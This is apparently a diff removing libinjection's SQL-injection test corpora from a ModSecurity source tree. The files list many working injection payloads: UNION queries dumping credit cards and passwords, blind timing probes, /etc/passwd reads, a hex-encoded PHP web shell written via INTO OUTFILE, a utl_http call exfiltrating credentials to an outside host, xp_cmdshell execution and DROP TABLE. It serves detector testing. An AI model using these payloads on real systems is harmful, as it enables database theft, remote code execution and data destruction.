1%20into%20outfile%20%27asd%27%0D%0A
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20a%20from%20b
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20into%20outfile%20%27asd%27%0D%0A
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
%27union%20select%20
%27union%20select
%22union%20select
1%20union%20select
%40a%20union%20select

4
src/deps/src/ModSecurity/others/libinjection/data/sqli-ibm.txt
View File

@ -1,4 +0,0 @@
# various things for http://www-01.ibm.com/support/knowledgecenter/SSGU8G_11.50.0/com.ibm.sqls.doc/ids_sqs_1526.htm
#
UNION ALL SELECT FileToClob("/etc/passwd", "server")::html,0
UNION ALL SELECT FileToBlob("/etc/passwd", "server")::html,0

20
src/deps/src/ModSecurity/others/libinjection/data/sqli-insert_attacks.txt
View File

@ -1,20 +0,0 @@
# solar empire attack
# http://www.exploit-db.com/exploits/4078/
# these use the multiple insert syntax
# INSERT INTO FOO VALUES (1, 'foo'), (2, 'bar) ....
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
# $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')"
# $sql = "INSERT INTO FOO VALUES ('$DIRTY', 2)"
F%2A%2A%2A%2A%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A
# numeric version
999%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
# arg switch
F%2A%2A%2A%2A%27%2C+2%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
# arg switch + numeric
999%2C+%27CRAP%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A
999%2C+1%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A

8
src/deps/src/ModSecurity/others/libinjection/data/sqli-isc_sans.txt
View File

@ -1,8 +0,0 @@
# http://isc.sans.edu/diary.html?storyid=12127
189%27%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version------snip----
189%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--------snip----
189%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29%29------snip----
189%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29------snip----
# http://isc.sans.edu/diary.html?storyid=11011
999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536--

7
src/deps/src/ModSecurity/others/libinjection/data/sqli-left.txt
View File

@ -1,7 +0,0 @@
#
# Yong Deng reported 2016-10-20
#
# Tests that "left" is treated as a function
#
# http://www.w3resource.com/mysql/string-functions/mysql-left-function.php
1'and left(database(),2)>'sa'--+

640
src/deps/src/ModSecurity/others/libinjection/data/sqli-misc.txt
View File

@ -1,640 +0,0 @@
#
# Misc collected attacks from the wild and beyond....
#
SO_BUY+AND+IF%281%3D1%2CBENCHMARK%281589466%2CMD5%280X41%29%29%2C0%29
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CDATABASE%28%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CUNHEX%28HEX%28CAST%28DATABASE%28%29+AS+CHAR%29%29%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1
PHPX+AND+1%3D1+AND+XX%3DX
PHPX+AND+CHAR%28124%29+USER+CHAR%28124%29%3D0+AND+XX%3DX
SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--%27
SO_BUY%27%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--
materials'%20and%201=1%20and%20''='
materials'%20and%201=2%20and%20''='
1'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='
-999.9'%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536%20and%20'x'='x
# not sql
#5000224%27%20UNION%20user_id%3E0--
-5000224%27%20UNION%20select%20user_id%20from%20users%20where%20user_id%3E0//
# not sql
#-5000224%27%20UNION%20user_id%3E0--
5000224%27%20or%201=1--
8+and+1=1--
8+order+by+1--
8-999.9+union+select+0
9-999.9+union+select+0--
6334588%00%27%7C%7CSLEEP%283%29%26%26%271
6334588%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29
6334588%26%26SLEEP%283%29
6334588%27%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29%20AND%20%271
6334588%27%20AND%20SLEEP%283%29%20AND%20%271
6402272%27%20%61%6E%64%20%27%36%27%3D%27%356402272%27%20%61%6E%64%20%27%36%27%3D%27%366444930%20%61%6E%64%20%36%3D%35
6444930%20%61%6E%64%20%36%3D%36
6444930%27%20%61%6E%64%20%27%36%27%3D%27%35
6444930%27%20%61%6E%64%20%27%36%27%3D%27%36
FOO%29%29+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29+AND+%28%283045%3D3045
1+%2B+%28SELECT+6744+FROM+DUAL+WHERE+3176%3D3176+AND+3761%3D5879%23+%29
1234.5%29+ORDER+BY+1
FOO%2C%28SELECT+%28CASE+WHEN+%284831%3D4831%29+THEN+1+ELSE+1%2F%28SELECT+0%29+END%29%29
FOO%29%3B+IF%28%286681%3D9099%29%2CSELECT+6681%2CDROP+FUNCTION+CGIQ%29%3B%23+AND+%284596%3D4596
FOO%2C%28SELECT+%28CASE+WHEN+%284763%3D4974%29+THEN+FOO+ELSE+4763%2A%28SELECT+4763+FROM+MYSQL.DB%29+END%29%29
FOO%29+WHERE+9060%3D9060+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29
FOO%29%29%29+AND+3787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT+%28CASE+WHEN+%283787%3D3787%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29
FOO+%2B+%28SELECT+9350+WHERE+8850%3D8850+AND+3963%3D4777--++%29
FOO%29+AND+4499%3D8923%23
FOO%2CIIF%282510%3D9436%2CFOO%2C1%2F0%29
FOO%29%29%3B+IF%28%288708%3D3788%29%2CSELECT+8708%2CDROP+FUNCTION+RIHR%29%3B%23+AND+%28%286571%3D6571
FOO%29%29%29%3B+IF%28%289256%3D5702%29%2CSELECT+9256%2CDROP+FUNCTION+IRII%29%3B%23+AND+%28%28%283502%3D350
%28SELECT+2299%3D%28%27%3AJQA%3A%27%7C%7C%28SELECT+CASE+2299+WHEN+2299+THEN+1+ELSE+0+END+FROM+RDB%24DATABASE%29%7C%7C%27%3AUGJ%3A%27%29%29
%28SELECT+2811+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280X3A6A71613A%2C%28SELECT+%28CASE+WHEN+%282811%3D2811%29+THEN+1+ELSE+0+END%29%29%2C0X3A75676A3A%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+X%29A%29
FOO%2CEXTRACTVALUE%288571%2CCONCAT%280X5C%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%288571%3D8571%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%29
%28CASE+WHEN+4518%3D5617+THEN+1+ELSE+NULL+END%29
FOO%29%29%3B+SELECT+PG_SLEEP%285%29%3B--
FOO%29%29%29%3B+BEGIN+DBMS_LOCK.SLEEP%285%29%3B+END%3B--+AND+%28%28%288410%3D8410
FOO%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%282114%3D2114
FOO%29%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%28%281285%3D1285
FOO+WAITFOR+DELAY+%270%3A0%3A5%27--
1+order+by+1
FOO%2C%28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT+%28CASE+WHEN+%281861%3D1861%29+THEN+1+ELSE+0+END%29%29%3A%3ATEXT%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29+AS+NUMERIC%29%29
%28SELECT+GENERATE_SERIES%28FOO%2CFOO%2CCASE+WHEN+%289255%3D9830%29+THEN+1+ELSE+0+END%29+LIMIT+1%29
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
999999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL--
-999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27--
-999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
999999.9+UNION+ALL+SELECT+CHR%28114%29%7C%7CCHR%2851%29%7C%7CCHR%28100%29%7C%7CCHR%28109%29%7C%7CCHR%2848%29%7C%7CCHR%28118%29%7C%7CCHR%2851%29%7C%7CCHR%2895%29%7C%7CCHR%28104%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%2895%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28106%29%7C%7CCHR%28101%29%7C%7CCHR%2899%29%7C%7CCHR%28116%29%7C%7CCHR%28105%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29--
CAT1_GALLERY_1+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL--
1 - ORD('A')
TRUE DIV(SELECT ORD(LEFT
TRUE DIV(SELECT (ORD(LEFT
TRUE DIV(SELECT ((ORD(LEFT
1 DIV(SELECT ORD(LEFT
1 DIV(SELECT (ORD(LEFT
0 UNION SELECT (1),2,3
1 AND (SELECT TOP 10 USERNAME FROM USERS);
1 AND SELECT 1 FROM T.TRANS_DATE -- 1
1 AND (SELECT 1 FROM T.TRANS_DATE -- 1
1 GROUP BY 1 HAVING 1 = 1
1 GROUP BY 1 HAVING '1' = 1
1 GROUP BY 1,TRANSID,ACCOUNTID HAVING 1=1
1 AND SELECT TOP 10 USERNAME FROM USERS -- 1
1001 union(select userid, ccnumber, '3', '4' from credit_cards)
1001 union((select userid, ccnumber, '3', '4' from credit_cards))
1001 union/*/**/*/select userid, ccnumber, '3', '4' from credit_cards
1001 or 'A' = 'B' union select userid, ccnumber, '3', '4' from credit_cards
'6334588?'||SLEEP(3)&&'1
1001*/*!50000(1)union*/all(select 1,ccnumber,3,4 from credit_cards)
1001*/*!50000(1)union select 1,ccnumber,load_file('/etc/passwd'),4 from credit_cards*/
(1001)union select-1,ccnumber,3,4 from credit_cards
(1001)union select (1),ccnumber,3,4 from credit_cards
(1001)union select @a,ccnumber,3,4 from credit_cards
1001-\N%0aunion select 1,ccnumber,3,4 from credit_cards
1001 sounds like '1001' union select 1,ccnumber,3,4 from credit_cards
1001-'text' union select 1,ccnumber,3,4 from credit_cards
1001%2b@a union select 1,load_file('/etc/passwd'),3,4 from credit_cards
((1001)-1) union select 1,2,3,4 from credit_cards
1001'-@a union select 1,2,3,4 from credit_cards-- -
'1001'-@a union select 1,2,3,4 from credit_cards
((1001)-1) union select 1,2,3,4 from credit_cards
1001 rlike(-1)union select 1,2,3,4 from credit_cards
## 1001 ----1 union select 1,2,3,4 from credit_cards
1001 or 'foo' union select 1,2,3,4 from credit_cards
1001 and @a union select 1,2,3,4 from credit_cards
1001 like @a-1 union select 1,2,3,4 from credit_cards
1001-\N-\N union select 1,2,3,4 from credit_cards
(1001-\N-\N) union select 1,2,3,4 from credit_cards
(1001-\N)-\N union select 1,2,3,4 from credit_cards
1001-\N union select 1,2,3,4 from credit_cards
1001-true union select 1,2,3,4 from credit_cards
(1001-true) union select 1,2,3,4 from credit_cards
(1001-'1') union select 1,2,3,4 from credit_cards
(1001-@version) union select 1,2,3,4 from credit_cards
1-(1001-true) union select 1,2,3,4 from credit_cards
1001-false-false union select 1,2,3,4 from credit_cards
1001-false-NULL union select 1,2,3,4 from credit_cards
1001 rlike(1-NULL)union select 1,2,3,4 from credit_cards
1001 rlike(1-(NULL))union select 1,2,3,4 from credit_cards
(1)-'1' union select 1,2,3,4 from credit_cards
(1)-@version union select 1,2,3,4 from credit_cards
(@version)-@version union select 1,2,3,4 from credit_cards
(@version)-1 union select 1,2,3,4 from credit_cards
(@version)-'1' union select 1,2,3,4 from credit_cards
@version-@version union select 1,2,3,4 from credit_cards
@version-1 union select 1,2,3,4 from credit_cards
@version-'1' union select 1,2,3,4 from credit_cards
('1')-'1' union select 1,2,3,4 from credit_cards
1001 rlike(-1-1)union select 1,2,3,4 from credit_cards
1001 rlike(1-1)union select 1,2,3,4 from credit_cards
1001 rlike(@version)union select 1,2,3,4 from credit_cards
1001 rlike(@version-1)union select 1,2,3,4 from credit_cards
1001 rlike(1-@version)union select 1,2,3,4 from credit_cards
1001 rlike('1')union select 1,2,3,4 from credit_cards
# vv new variations 2013-04-10 nickg vv
1001 RLIKE ((1)) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE ((-1)) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE ((-"1")) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE (-(1)) UNION SELECT 1 FROM CREDIT_CARDS
1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS
# http://vagosec.org/2013/04/mysql-implicit-type-conversion/
# a'+'b encoded is a%27%2B%27b
a%27%2B%27b
' OR 1='1
# new variations
X' != 'Y' = 0 = '1
X' = 'X' = 0 = '1
X' = 'X' = 'X' = 0 = '1
X' - 'Y' - 0 = '1
# part of parameter pollution
1) FROM USERS WHERE USERNAME=
# nest pgsql mssql comments
1/* /*/ */ */ or 1=1-
1/* /* / */ */ or 1=1-
# small sqli
1--
1 --
1 --
1/*
1 /*
1 /*
1*1--
1 * 1--
1 * 1 --
1*1/*
1 * 1/*
1 * 1 /*
1 * 1 /*
@version--
@@version--
@version --
@version /*
@version/*
# thanks @d0znpp
(select id from users limit 1,1)
(select id-0 from users limit 1,1)
# known bypass.. for now!
(select id,id,id,id from users limit 1,1)
# some variations
'1' union (select id from users limit 1,1)
1 union (select id from users limit 1,1)
xxx union (select id from users limit 1,1)
@version union (select id from users limit 1,1)
'1' union (select 1 from users limit 1,1)
1 union (select 1 from users limit 1,1)
xxx union (select 1 from users limit 1,1)
@version union (select 1 from users limit 1,1)
'1' union (select xxx from users limit 1,1)
1 union (select xxx from users limit 1,1)
xxx union (select xxx from users limit 1,1)
@version union (select xxx from users limit 1,1)
'1' union (select 's' from users limit 1,1)
1 union (select 's' from users limit 1,1)
xxx union (select 's' from users limit 1,1)
@version union (select 's' from users limit 1,1)
# thanks @LightOS
-1 union(((select table_name from information_schema.tables limit 1,1)))
'1' union(((select table_name from information_schema.tables limit 1,1)))
@foo union(((select table_name from information_schema.tables limit 1,1)))
id union(((select table_name from information_schema.tables limit 1,1)))
# and again @LightOS
test'-1/1/**/union(select table)
test'-1 union(select table)
test'-@version union (select table)
test'-'xyz' union (select table)
1- @version union(select table_name from information_schema.tables limit 1,1)
1- 'xxx' union(select table_name from information_schema.tables limit 1,1)
1- union(select table_name from information_schema.tables limit 1,1)
@version - @version union(select table_name from information_schema.tables limit 1,1)
@version- 'xxx' union(select table_name from information_schema.tables limit 1,1)
@version - 5 union(select table_name from information_schema.tables limit 1,1)
#
1 into outfile 'asd'
1 into outfile 'asd'--
'1' into outfile 'asd'
'1' into outfile 'asd' --
@version into outfile 'asd'
@version into outfile 'asd' --
1 into outfile ('asd')
'1' into outfile ('asd')
@version into outfile ('asd')
1 into outfile substring('asd', 10, 1)
'1' into outfile substring('asd', 10, 1)
@version into outfile substring('asd', 10 1)
1 into outfile (substring('asd', 10, 1))
'1' into outfile (substring('asd', 10, 1))
@version into outfile (substring('asd', 10 1))
%28select+substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom+users+limit+1%2C1%29
union%20%28select+id+from+users+limit+1%2C1%29
#
# This is not valid SQL but designed to force a syntax error
# http://www.modsecurity.org/testphp.vulnweb.com/listproducts.php?cat=1%0Aand+current_user=notthere()
1%0Aand+current_user=notthere()
1%0Aand+current_user=1
1%0Aand+current_user=@version
1%0Aand+current_user='junk'
1%0Aand+current_user=foo
1--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
1'--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
@version--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29
-.1a%20union%20%28select+id+from+users+limit+1%2C1%29
case 1 when 2 then 2 end
case sin(1) when 2 then 2 end
case '1' when 2 then 2 end
case 1 when 's' then 2 end
case when 2 then 3 end
case when 's' then 3 end
case when f(1) then 3 end
-1 union select table_name asda from information_schema.tables
-1 union select table_name "asda" from information_schema.tables
-1 union select table_name `asda` from information_schema.tables
-1 union select table_name as asda from information_schema.tables
-1 union select table_name as "asda" from information_schema.tables
-1 union select table_name as `asda` from information_schema.tables
a'and(select(binary(/*!system_user()*/)))like'reading%25
-1 union select @``"", table_name from information_schema.tables
'foo' union select @``"", table_name from information_schema.tables
@version union select @``"", table_name from information_schema.tables
select @version foo
select @version "foo"
select @version foo -- junk
select @version "foo" -- junk
$$pgsql evade$$ union select * from foo
$foo$pgsql evade$foo$ union select * from foo
u&'pgsql evade' union select * from foo
U&'pgsql evade' union select * from foo
U&'pgsql evade' uescape '!' union select * from foo
_latin1'foo' union select * from foo
_LATIN7'foo' union select * from foo
_utf8'foo' union select * from foo
REAL 1 union select * from foo
1::REAL union select * from foo
1::REAL::REAL union select * from foo
-1 union select @``"", table_name from information_schema.tables
!~1 union select table_name from information_schema.tables
-1 union select @a`from 1`, table_name from information_schema.tables
version() union select table_name from information_schema.tables
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
1 is unknown union select table_name from information_schema.tables
true is not unknown for update union select table_name from information_schema.tables
1 for update union select 1
# ht/ TK
(true)-(true)union select table_name from information_schema.tables
(@a)-(@a)union select table_name from information_schema.tables
# ht/ @stamparm
1 OR (1 OR 1)--
(1) OR (1 OR 1)--
((1) OR (1 OR 1))--
((1) OR ((1 OR 1)))--
1 OR ((1 OR 1)) --
1 OR ((1) OR 1) --
# ht/ @stamparm
(@x OR @y) UNION ALL SELECT name,email,password FROM users--
(@x OR (@y)) UNION ALL SELECT name,email,password FROM users--
((@x) OR @y) UNION ALL SELECT name,email,password FROM users--
(@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
@x OR (@y) UNION ALL SELECT name,email,password FROM users--
# ht/ @stamparm
(SELECT 1 FROM DUAL)
(SELECT @a FROM DUAL) UNION ALL SELECT 1, 2, 3--
(SELECT (1) FROM DUAL)
(select @version from dual)
(select (@version - 1) from dual)
(select ('foo' - 1) from dual)
(select 'foo' from dual)
(select 1 foobar from dual)
# previously had problems with operators made from two words
# ht/@stamparm
1 and 1 not between 0 and 1
1 AND 1 SOUNDS LIKE 1
1 AND 1 NOT LIKE 0
(1 AND 1) OR 2>1--
# ht/@FluxReiners
'-(1 or 1) and 1=0 union select load_file('/etc/passwd'),credit_card,password from users-- -
'-(-1 or -1) and 1=0 union
'-(-(1) or -1) and 1=0 union
'-((1) or -1) and 1=0 union
# https://twitter.com/dsrbr/status/342132003270959104
-1 union select null, listagg(login || ':' || pass,', ') within group (order by login) from users;
-1 union select null, xmlagg(xmlelement("user",login || ':' || pass).getStringVal() from users;
-1 union select null, stragg(login || ':' || pass ||', ') from users;
-1 union select listagg(login || ':' || pass,', ') within group (order by login) from users;
#ht ivan
users.id%0D%0A%23asd%0D%0Aunion%0D%0A%23asd%0D%0Aselect%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aaa+%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Afrom%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aasdasd
# http://samincube.blogspot.ru/2013/06/time-based-sqli-on-google-coupon.html
1'=sleep(1)='1
# https://twitter.com/dsrbr/status/343017094926962691
1 and select (utl_http.request('http://client9.com/') || select listagg(login || chr(58) || pass || ', ') within group (order by login) from dual) is not null;
# https://twitter.com/dsrbr/status/341228356936814592
-1 union select top 1 null, lead(pass, 0) over (order by pass) from users;
# https://twitter.com/dsrbr/status/340018970054766592
-1 union select null, array_to_json(array_agg(users))::text from users limit 1;
1 and (select array_to_json(array_agg(users))::text::bool from users limit 1;
# http://www.exploit-db.com/exploits/25915/
' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e,null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE 'afile.php'
# http://blog.detectify.com/post/51651525114/the-ultimate-sql-injection-payload
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
# misc secondary sql statements
1 and true; BEGIN DECLARE @xy varchar(8000)
1; BEGIN DECLARE @xy varchar(8000)
x' and 1 = 0; BEGIN DECLARE
x' AND 1=0; DROP TABLE TMP_DB;
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE
# https://twitter.com/st1ll_di3/status/344416764949561346
# http://pastebin.com/Ymcs7nE0
(--- 0)'=(currenT_user()-3) union select 1,2,3 from users; -- -
# example from http://www.websec.ca/kb/sql_injection
1=1 AND-+-+-+-+~~((1))
# the bizarre sp_password hackery
1-- foo sp_password
1'--sp_password
# nice ms-access, courtesy mod-security
foo' Eqv StrComp(username, 0x12+0x34+0xab+0xcd,0) Imp 'a
# mysql and pgsql string litterals
b'1' UNION SELECT 1
x'1' UNION SELECT 1
n'1' UNION SELECT 1
# ending clauses
1 having 1 limit 1 union select 1--
1 having (1) limit 1 union select 1--
1 having -(1) limit 1 union select 1--
1 having sin(1) limit 1 union select 1--
1 having 1 limit 2 group by 3 union select 1--
1 group by 2 union select 1 --
sin(1) group by 1 union select 1--
@version group by 1 union select 1--
@version group by (-1) union select 1--
(@version) group by -1 union select 1--
(@version) group by (-1) union select 1--
(@version)) group by (-1) union select 1--
(1)) group by (-1) union select 1--
(@version) group by sin(-1) union select 1--
1 group by sin(1) union select 1--
1 group by 1 - sin(1) union select 1--
1 group by (sin(1)) union select 1--
-1 group by -(-sin(1)) union select 1--
sin(1) group by (-sin(1)) union select 1--
sin(1)-1 group by (-sin(1)) union select 1--
sin(1)-1 group by 1 union select 1--
1 group by ((1)) union select 1--
1 group by (((1))) union select 1--
((1)) group by (1) union select 1--
(1) group by ((1)) union select 1--
(1) group by (1) union select 1--
# more with 'having'
-(1) is not unknown having 1 order by 1 limit 1 for update UNION select table_name from information_schema.tables limit 1
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
-(1) is not unknown for update UNION select table_name from information_schema.tables limit 1
-(1) is not unknown having 1 order by 1 limit 1 UNION select table_name from information_schema.tables limit 1
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
-(1) is unknown having 1 UNION select table_name from information_schema.tables limit 1
-(1) for update UNION select table_name from information_schema.tables limit 1
1 for update UNION select table_name from information_schema.tables limit 1
-(1) for update UNION select table_name from information_schema.tables limit 1
-(true) for update UNION select table_name from information_schema.tables limit 1
-(null) for update UNION select table_name from information_schema.tables limit 1
-(\N) for update UNION select table_name from information_schema.tables limit 1
-(\N) for update having true UNION select table_name from information_schema.tables limit 1
-(\N) for update having 1 UNION select table_name from information_schema.tables limit 1
-(1) for update having 1 UNION select table_name from information_schema.tables limit 1
-(1) having 1 for updateUNION select table_name from information_schema.tables limit 1
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
\''; DROP TABLE users; --
\''); DROP TABLE users; --
\''; /* one */ ;DROP TABLE users; --
\''; select 1; drop table users; --
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
1; EXECUTE AS LOGIN 'root'; GO xp_cmdshell 'whoami.exe' ; REVERT ;
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
